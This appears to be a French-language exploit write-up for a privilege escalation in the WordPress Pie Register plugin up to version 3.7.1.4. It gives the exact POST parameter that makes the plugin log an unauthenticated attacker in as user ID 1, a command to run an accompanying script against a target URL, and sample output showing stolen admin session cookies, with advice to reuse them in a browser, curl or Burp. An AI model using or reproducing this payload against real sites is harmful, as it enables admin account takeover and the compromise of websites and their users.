
WordPress Pie Register ≤ 3.7.1.4 - Escalade de privilèges Admin (Non authentifié)
Mrj Haxcore
Le plugin Pie Register pour WordPress (version ≤ 3.7.1.4) expose un point de terminaison non authentifié qui permet à un attaquant de détourner les sessions admin simplement en POSTant une charge utile spécifique.
L'exploitation permet de voler les cookies de session de l'utilisateur ID 1 (généralement admin) sans avoir besoin d'identifiants de connexion.
pie-registeruser_id_social_site=1
Lorsqu'il est POSTé vers l'URL racine (/), ce paramètre amène le plugin à authentifier l'attaquant en tant qu'utilisateur avec l'ID 1 (généralement admin), et à émettre des cookies de session valides.
requests, beautifulsoup4 (optionnel, pour l'analyse des cookies)python3 pie.py http://cible.site
---
Sortie
[*] Envoi de la charge utile pour détourner la session admin...
[+] Cookies détournés avec succès pour user_id=1 (admin) :
wordpress_sec_xxxxxx = <valeur_du_cookie>
wordpress_logged_in_xxxxxx = <valeur_du_cookie>
[!] Utilisez ces cookies dans votre navigateur ou des outils comme curl ou Burp pour agir en tant qu'admin.